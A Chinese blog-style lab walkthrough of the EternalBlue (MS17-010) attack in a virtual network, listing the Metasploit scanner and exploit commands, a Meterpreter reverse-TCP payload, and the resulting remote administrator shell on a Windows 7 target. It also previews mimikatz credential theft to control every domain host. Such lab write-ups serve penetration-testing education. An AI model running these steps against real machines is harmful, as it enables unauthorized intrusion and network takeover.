永恒之蓝实验(内网渗透--实践篇)

说明: 原理下一篇会讲解(主要是通过wireshare抓包一个一个包地分析到底如何建立连接,以及渗透win7后拿下shell应该注意些什么和采取的措施。也就是渗透后期工作,扩大战果,对于windows server 2008 如何通过一个域账号利用mimikatz获取管理员账户的密码,继而对整个域控下的主机都形成僵尸控制(通过木马或者控制软件)
实验环境:
攻击机: 虚拟机kali-linux 一台 IP设为自动获取
靶机: 虚拟机win7 IP为自动获取
虚拟机windows server 2008 r2 ip为自动获取
实验步骤:
1. 配置网络
网卡使用VMnet8,通过物理机可知:
永恒之蓝实验(内网渗透--实践篇)_第1张图片
kali IP: 192.168.2.130
在这里插入图片描述
win7 IP: 192.168.2.56
永恒之蓝实验(内网渗透--实践篇)_第2张图片
win server 2008 ip : 192.168.2.135
永恒之蓝实验(内网渗透--实践篇)_第3张图片
测试下网络是否能通:(将win7 和 win server 防火墙关闭)
永恒之蓝实验(内网渗透--实践篇)_第4张图片
-c 2 是控制ping 发送两个icmp包
2. 打开kali 利用msf 框架进行渗透
先查看kali数据库是否开启
service postgresql status
永恒之蓝实验(内网渗透--实践篇)_第5张图片
active (exited) 说明开启了 postgresql
如果没有开启就是这样的:
永恒之蓝实验(内网渗透--实践篇)_第6张图片
还可以设置postgresql 开机自启:
update-rc.d postgresql enable
进入msfconsole (每次界面随机,不固定)
初始化数据库 msfdb init 永恒之蓝实验(内网渗透--实践篇)_第7张图片
查看是否连接上:
db_status
在这里插入图片描述
下面直接查找漏洞ms17_010 (永恒之蓝就是利用这个漏洞)
永恒之蓝实验(内网渗透--实践篇)_第8张图片
关注两个:
auxiliary/scanner/smb/smb_ms17_010 扫描漏洞
后面设置了扫描目标以及多线程数后要抓包分析
exploit/windows/smb/ms17_010_eternalblue 漏洞利用
exploit 英文单词就是利用的意思
永恒之蓝实验(内网渗透--实践篇)_第9张图片
use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞进来以后
不知道接下来如何操作,options 查找帮助,关注两个点:
RHOSTS YES 说明可以利用 The target address range 扫描主机的范围
一般内网中都是 ip/24
THREADS 线程数默认是1 后面我们要使用多线程加快扫描进度
永恒之蓝实验(内网渗透--实践篇)_第10张图片
set rhosts 后面是win7的IP
set threads 30 设置线程数为30
run 执行扫描过程(同时打开wireshark抓包分析)
具体漏洞利用原理下一篇会详细介绍)
扫描到的信息: 具体关注点

发现 192.168.2.56 开启了 445端口这正是漏洞利用的端口,
同时发现: host is likely vulnerable to ms17_010 主机很可能受到ms17_010的攻击
发现目标是win7 专业版SP1 64位
下面发起渗透:
永恒之蓝实验(内网渗透--实践篇)_第11张图片
use exploit/windows/smb/ms17_010_eternalblue 利用漏洞发起初步进攻
set rhost ip 设置攻击目标
set payload windows/x64/meterpreter/reverse_tcp 设置攻击载荷
set lhost ip 设置监听主机
exploit 发起攻击
永恒之蓝实验(内网渗透--实践篇)_第12张图片
结果:已经和目标建立连接
sysinfo 查看目标信息
永恒之蓝实验(内网渗透--实践篇)_第13张图片
shell 直接拿下管理员权限
永恒之蓝实验(内网渗透--实践篇)_第14张图片
至此整个攻击过程已经完成。但是!!但是!但是!
渗透测试不止于此,切记。接下来的工作下一篇详细讲解。

你可能感兴趣的:(虚拟机,linux,kali渗透测试)